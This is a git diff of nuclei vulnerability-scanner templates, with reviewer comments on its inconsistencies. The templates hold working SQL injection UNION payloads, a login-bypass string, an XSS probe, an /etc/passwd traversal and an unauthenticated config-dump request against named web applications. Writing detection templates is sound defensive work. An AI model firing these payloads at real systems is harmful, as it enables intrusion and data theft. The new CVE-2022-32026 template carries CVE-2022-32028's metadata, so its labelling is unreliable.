@@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31978 cwe-id: CWE-89 - epss-score: 0.01029 - epss-percentile: 0.82159 + epss-score: 0.02031 + epss-percentile: 0.88685 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: @@ -45,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success")' condition: and -# digest: 4a0a00473045022100e1af9247f70e01a6a9426c0799b108204348a72bede0c3f365524ced84a27254022060091c3aad3b5f0491c2bc1ded94fa56451a0dd5105b5bdeee610faedc7ec1e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082920a5d3562240e8e93e567926bda08298baef90f3839368b24000a172d9c4f022100d9c68292bb99fd7bd81974408e1931f6f60e746db4fb80eac1150e70edb76316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31980.yaml b/nuclei-templates/CVE-2022/CVE-2022-31980.yaml index eeb64a488f..3c9c973c05 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31980.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31980.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31980 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.01429 + epss-percentile: 0.85199 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - method: GET @@ -40,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Control Teams")' condition: and -# digest: 4a0a00473045022100bff477ac6051906a524ff02263e50769db9293009709ab453e3afa2302671a7a022030b2031e32382f958d4204838d5a4e1e48edad4070309ff3e17ba2c7941d9de5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d3341f65cb26f4caef4623c562e9c774a42d72d1b51a42bb411f7ff44a7bf95d022100b2ee810fbeb3fca59b9907d6cdfe24246501706f3d77fa3b5e7526e32f8fc395:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31981.yaml b/nuclei-templates/CVE-2022/CVE-2022-31981.yaml index 08a5c619e3..63697be4ed 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31981.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31981.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31981 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.01426 + epss-percentile: 0.8625 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - method: GET @@ -40,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Control Teams")' condition: and -# digest: 4a0a00473045022100c5abdb3bcfa59cd35b6a6e6dadd702733ef2fc15b92c37c0dcf1973ac64665b8022032502273bbe23c7bc8a62818e8eaa1b26d3068f11b21eb44ee70ccbf766fff2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2b77265247a844a543151ac19f0fe136cefd62457e9c581791c7336c9fa50b002200fc31e19654ac1e011b7104483458e1e4e86216cb0c341d0833cf50fce833ce1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31982.yaml b/nuclei-templates/CVE-2022/CVE-2022-31982.yaml index 0284d3b257..ec3c541336 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31982.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31982.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31982 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.01426 + epss-percentile: 0.8625 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - method: GET @@ -40,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Request Detail")' condition: and -# digest: 4a0a00473045022100e33945ad8e8a8ff4c0ae77d6eb069afb73e05267c12df56b4225e6fcf2815cab022014765f41dbb300e9db882cadc42348d7b8793373d885344750279d7c8df8f5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010dde84fca947b7396161fd4683955e87f7f25ea2671996f04fd6011e69346220220781574af1cca7ad8a241f7d8ab76479836e61236b6b46d7a4f9136cea968d23b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31983.yaml b/nuclei-templates/CVE-2022/CVE-2022-31983.yaml index 080568e291..d7d9c8d698 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31983.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31983.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31983 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - method: GET @@ -40,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Request Detail")' condition: and -# digest: 4a0a00473045022100c5785b6fbe98581473982974804d6759501979d5d9b11be1190f6843b302daf2022035a9ed8ae42b4cebdba6dc775e2075a5ca4e627e89bd9c18030290a43aae6669:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dda1b407e3946a8d08dfe8a4da98bf95b77bfae535eb9499bc7f8d5cb0a06d740220401b92b24b02946161684222dbac0c6812a97c86916ab5ccdaffcd491809fcde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31984.yaml b/nuclei-templates/CVE-2022/CVE-2022-31984.yaml index 33bbbb44e6..301514c200 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31984.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31984.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database. remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31984 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.01426 + epss-percentile: 0.8625 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project variables: num: '999999999' @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008f86a8176fdf2a60ed5c25008112a050525dabfad97e95d2bf905811018e864502205f0cc1f2f76f7502cbe77de4f02f3014d14872e35a9a2a9f29b4159d3fcbc1ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c27b0c9f46ef199d8a55356b8e1c6b8e6d55e3e55a7328af4b676cf6d33f3be502205b712981499f0d873739591c3fe20fba293ffe5b84d29e3fe4d229bbbb989a2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32015.yaml b/nuclei-templates/CVE-2022/CVE-2022-32015.yaml index 3fff028ab9..b1faf475d6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32015.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32015.yaml 
@@ -1,42 +1,29 @@ id: CVE-2022-32015 - info: - name: Complete Online Job Search System 1.0 - SQL Injection + name: Complete Online Job Search System v1.0 - SQL Injection author: arafatansari severity: high description: | - Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. + Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=category&search=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32015 - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-32015 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 - cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: complete_online_job_search_system_project - product: complete_online_job_search_system - tags: cve,cve2022,sqli,jobsearch,complete_online_job_search_system_project + verified: "true" + tags: cve,cve2022,sqli,jobsearch variables: num: "999999999" - -http: +requests: - method: GET path: - "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+" - matchers: - type: word part: body words: - '{{md5({{num}})}}' -# digest: 
4b0a00483046022100c34036939ef2413c02af88cb8e86ecd6b3be7f27866b7d0ca21d3b7a269e47a8022100cf88f059ea7f102348f18a69cc9b78e11fc69e56a09b123e5a590fee4b261619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32018.yaml b/nuclei-templates/CVE-2022/CVE-2022-32018.yaml index b9819f6aa3..1fa8cbf9bc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32018.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32018.yaml @@ -1,11 +1,10 @@ id: CVE-2022-32018 - info: - name: Complete Online Job Search System 1.0 - SQL Injection + name: Complete Online Job Search System v1.0 - SQL Injection author: arafatansari severity: high description: | - Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=hiring&search=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32018 @@ -17,19 +16,14 @@ info: metadata: verified: "true" tags: cve,cve2022,sqli - variables: num: "999999999" - requests: - method: GET path: - "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+" - matchers: - type: word part: body words: - '{{md5({{num}})}}' - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32024.yaml b/nuclei-templates/CVE-2022/CVE-2022-32024.yaml index 702a2df8ed..644f0f8df2 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32024.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32024.yaml 
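Review bot: The new side of CVE-2022-32015.yaml moves back to the `requests:` key and drops the `# digest:` signature footer, `max-request`, `cpe`, the EPSS fields, `remediation` and the vendor/product metadata that the rest of this commit is adding to other templates; `requests:` is the pre-v3 protocol name that current nuclei releases accept only as a deprecated alias of `http:`. The same reversal is applied to CVE-2022-33119.yaml further down, while CVE-2022-32094.yaml and CVE-2022-32429.yaml in this very commit go the other way (`requests:` → `http:`), so the commit is internally inconsistent rather than a uniform update. Keep `http:` and the signed footer here and restore the dropped classification lines (`epss-score: 0.01426`, `epss-percentile: 0.8625` and the `cpe:` entry) unless the downgrade is intentional. The `verified: true` → `verified: "true"` edit is cosmetic but likewise contradicts the direction taken in CVE-2022-32094.yaml.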
@@ -1,11 +1,10 @@ id: CVE-2022-32024 - info: - name: Car Rental Management System 1.0 - SQL Injection + name: Car Rental Management System v1.0 - SQL Injection author: arafatansari severity: high description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + Car Rental Management System v1.0 is vulnerable to SQL Injection via /booking.php?car_id=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32024 @@ -19,10 +18,8 @@ info: shodan-query: http.html:"Car Rental Management System" verified: "true" tags: cve,cve2022,carrental,cms,sqli,authenticated - variables: num: "999999999" - requests: - raw: - | @@ -31,11 +28,9 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 Host: {{Hostname}} - skip-variables-check: true cookie-reuse: true matchers-condition: and @@ -44,9 +39,6 @@ requests: part: body words: - '{{md5({{num}})}}' - - type: status status: - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32026.yaml b/nuclei-templates/CVE-2022/CVE-2022-32026.yaml new file mode 100644 index 0000000000..87d30308b6 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32026.yaml 
@@ -0,0 +1,47 @@ +id: CVE-2022-32026 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32028 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 + Host: {{Hostname}} + skip-variables-check: true + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32028.yaml b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml index b598d48ce0..6afb4dca59 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32028.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml 
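Review bot: The new file's `id: CVE-2022-32026` disagrees with its own `cve-id: CVE-2022-32028` and with the NVD reference, which also points at CVE-2022-32028; the request path (`/admin/manage_user.php?id=`), the `SQLi-8.md` reference and the matchers are identical to CVE-2022-32028.yaml in the next hunk, so this reads as a copy of that template with only the filename and `id` changed. Either the classification, reference and request should be corrected to whatever CVE-2022-32026 actually covers, or the file should be dropped as a duplicate. Separately, `redirects: true` follows redirects to any host, whereas `host-redirects: true` (what CVE-2022-32028.yaml used before the same change in its hunk) keeps the follow-up requests — and the reused admin session cookie — on the target host; unless cross-host redirects are actually needed here, `host-redirects: true` is the safer setting for both files.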
@@ -1,11 +1,10 @@ id: CVE-2022-32028 - info: - name: Car Rental Management System 1.0 - SQL Injection + name: Car Rental Management System v1.0 - SQL Injection author: arafatansari severity: high description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 @@ -19,10 +18,8 @@ info: shodan-query: http.html:"Car Rental Management System" verified: "true" tags: cve,cve2022,carrental,cms,sqli,authenticated - variables: num: "999999999" - requests: - raw: - | @@ -31,13 +28,11 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 Host: {{Hostname}} - skip-variables-check: true - host-redirects: true + redirects: true max-redirects: 2 cookie-reuse: true matchers-condition: and @@ -46,9 +41,6 @@ requests: part: body words: - '{{md5({{num}})}}' - - type: status status: - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32094.yaml b/nuclei-templates/CVE-2022/CVE-2022-32094.yaml index f32ecc9e57..43fd7e005e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32094.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32094.yaml 
@@ -6,20 +6,32 @@ info: severity: critical description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/ - https://nvd.nist.gov/vuln/detail/CVE-2022-32094 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-32094 cwe-id: CWE-89 + epss-score: 0.01192 + epss-percentile: 0.83651 + cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: hospital_management_system_project + product: hospital_management_system shodan-query: http.html:"Hospital Management System" - verified: "true" - tags: cve,cve2022,hms,cms,sqli,auth-bypass + tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project -requests: +http: - raw: - | POST /hms/doctor/ HTTP/1.1 @@ -30,7 +42,7 @@ requests: host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -43,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/09/26 +# digest: 4b0a0048304602210084fb69c1a03081213ac49cd95c8961662947511ae874b68981e489142096f3a3022100bc20375d33139ca01dac35f08cfcf15bd4ebd45605b6e478d37fd6fb506091ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-32195.yaml b/nuclei-templates/CVE-2022/CVE-2022-32195.yaml index a8cef00f12..a06e93bdc7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32195.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32195.yaml @@ -6,22 +6,34 @@ info: severity: medium description: | Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. + remediation: | + Apply the latest security patches or updates provided by Open edX to fix the Cross-Site Scripting vulnerability. reference: - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408 - https://github.com/edx - https://nvd.nist.gov/vuln/detail/CVE-2022-32195 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-32195 cwe-id: CWE-79 + epss-score: 0.00112 + epss-percentile: 0.43735 + cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:* metadata: - comment: Hover the cursor on the redirect link + verified: true + max-request: 1 + vendor: edx + product: open_edx shodan-query: http.html:"Open edX" - verified: "true" - tags: cve,cve2022,openedx,xss + comment: Hover the cursor on the redirect link + tags: cve,cve2022,openedx,xss,edx -requests: +http: - method: GET path: - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)' @@ -41,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4b0a00483046022100d1e44091a63188927cbb7a9f6b8d42e7480fcfe75384863173fdee98142046c002210080ce0e4cfa487b2b08f8891139e605f8293b0b80a4250b609f1c9ff37505ffb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml b/nuclei-templates/CVE-2022/CVE-2022-32409.yaml deleted file mode 100644 index 45a9d0ff2e..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-32409 - -info: - name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion - author: pikpikcu - severity: critical - description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. - reference: - - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt - - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-32409 - cwe-id: CWE-94 - metadata: - shodan-query: http.html:"i3geo" - verified: "true" - tags: cve,cve2022,i3geo,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2022/CVE-2022-3242.yaml b/nuclei-templates/CVE-2022/CVE-2022-3242.yaml index d2a86082df..ab1b488535 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3242.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3242.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3242 cwe-id: CWE-79,CWE-94 - epss-score: 0.02392 - epss-percentile: 0.88709 + epss-score: 0.024 + epss-percentile: 0.8882 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true 
@@ -25,7 +25,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 - tags: huntr,xss,cve,cve2023,microweber + tags: cve,cve2022,huntr,xss,microweber http: - method: GET @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")' condition: and -# digest: 4a0a0047304502205a6b07b307697dc983f6c5b001a2c4ba4cbe962ba71d8aa644f363f561d73e47022100a60f0abf50eff9552e08371533f3c0364e214c92d0e6938dc918d776f54a633f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049539640dca818e246d16d9d5c7e24b3499600ed18ff1d74a3608b845d89688102207932b2ed5c81f7a4c34b58c4da1de8032eb2e0c1920be395f0b14d309d69293b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32429.yaml b/nuclei-templates/CVE-2022/CVE-2022-32429.yaml index 8590204655..f946f1268c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32429.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32429.yaml 
@@ -1,26 +1,38 @@ id: CVE-2022-32429 info: - name: MSNSwitch Firmware MNT.2408 - Configuration Dump + name: MSNSwitch Firmware MNT.2408 - Authentication Bypass author: theabhinavgaur severity: critical description: | - The vulnerability is an authentication bypass which allows the full configuration of the unit to be downloaded. The credentials obtained here can then be used via a local subnet vulnerability to obtain a full root shell on the device. + MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device. + remediation: | + Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability. reference: - https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html - https://elifulkerson.com/CVE-2022-32429/ - https://nvd.nist.gov/vuln/detail/CVE-2022-32429 + - http://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-32429 cwe-id: CWE-287 + epss-score: 0.15342 + epss-percentile: 0.95742 + cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: megatech + product: msnswitch_firmware shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132 - verified: "true" - tags: config,dump,packetstorm,cve,cve2022,msmswitch,unauth,switch + tags: cve2022,cve,config,dump,packetstorm,msmswitch,unauth,switch,megatech -requests: +http: - method: GET path: - 
"{{BaseURL}}/cgi-bin-hax/ExportSettings.sh" @@ -42,3 +54,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100f40c78cc0f0a72c1f287552733d6a8029c75a95273b1d2e8e9c7b02c553392850220647bafa53296ecf2b294942dd964b0f8ea4c278bd17ba8b267a8ecc5fad97fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32430.yaml b/nuclei-templates/CVE-2022/CVE-2022-32430.yaml new file mode 100644 index 0000000000..98550c804a --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32430.yaml 
